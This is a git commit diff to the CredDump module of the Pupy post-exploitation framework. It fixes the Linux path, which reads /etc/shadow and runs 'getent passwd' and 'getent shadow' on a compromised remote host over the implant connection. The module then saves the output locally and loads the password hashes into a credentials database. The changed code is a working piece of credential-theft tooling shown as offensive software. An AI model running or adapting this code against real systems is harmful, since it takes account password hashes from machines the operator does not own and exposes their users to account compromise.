Fix creddump/linux

This commit is contained in:
Oleksii Shevchuk 2017-04-11 15:53:36 +03:00
parent d257c92a57
commit c2d817e264
1 changed files with 15 additions and 12 deletions

View File

@ -39,16 +39,13 @@ __class_name__="CredDump"
class CredDump(PupyModule): class CredDump(PupyModule):
""" download the hives from a remote windows system and dump creds """ """ download the hives from a remote windows system and dump creds """
dependencies = {
'linux': [ 'pupyutils.safepopen' ]
}
def init_argparse(self): def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog='hive', description=self.__doc__) self.arg_parser = PupyArgumentParser(prog='hive', description=self.__doc__)
def run(self, args): def run(self, args):
self.rep = os.path.join("data", "downloads", self.client.short_name(), "creds") config = self.client.pupsrv.config or PupyConfig()
self.db = Credentials(client=self.client.short_name(), config=self.config) self.db = Credentials(client=self.client.short_name(), config=self.config)
self.rep = os.path.join(config.get_folder('creds'), self.client.short_name())
try: try:
os.makedirs(self.rep) os.makedirs(self.rep)
@ -120,22 +117,28 @@ class CredDump(PupyModule):
except Exception as e: except Exception as e:
self.error('/etc/shadow is not accessible: {}'.format(e)) self.error('/etc/shadow is not accessible: {}'.format(e))
sopen = self.client.conn.modules['pupyutils.safepopen'].SafePopen rsubprocess = self.client.conn.modules.subprocess
try: try:
with open(os.path.join(self.rep, 'getent.passwd'), 'w') as passwd: with open(os.path.join(self.rep, 'getent.passwd'), 'w') as passwd:
for line in sopen(['getent', 'passwd']).execute(): for line in rsubprocess.check_output('getent passwd', shell=True).split('\n'):
if line: if not line:
continue
add_hashes(line) add_hashes(line)
passwd.write(line+'\n')
except Exception as e: except Exception as e:
self.error('getent passwd failed: {}: {}'.format(type(e), e.message)) self.error('getent passwd failed: {}: {}'.format(type(e), e.message))
try: try:
with open(os.path.join(self.rep, 'getent.shadow'), 'w') as shadow: with open(os.path.join(self.rep, 'getent.shadow'), 'w') as shadow:
for line in sopen(['getent', 'shadow']).execute(): for line in rsubprocess.check_output('getent shadow', shell=True).split('\n'):
if line: if not line:
continue
add_hashes(line) add_hashes(line)
shadow.write(line+'\n')
except Exception as e: except Exception as e:
self.error('getent shadow failed: {}: {}'.format(type(e), e.message)) self.error('getent shadow failed: {}: {}'.format(type(e), e.message))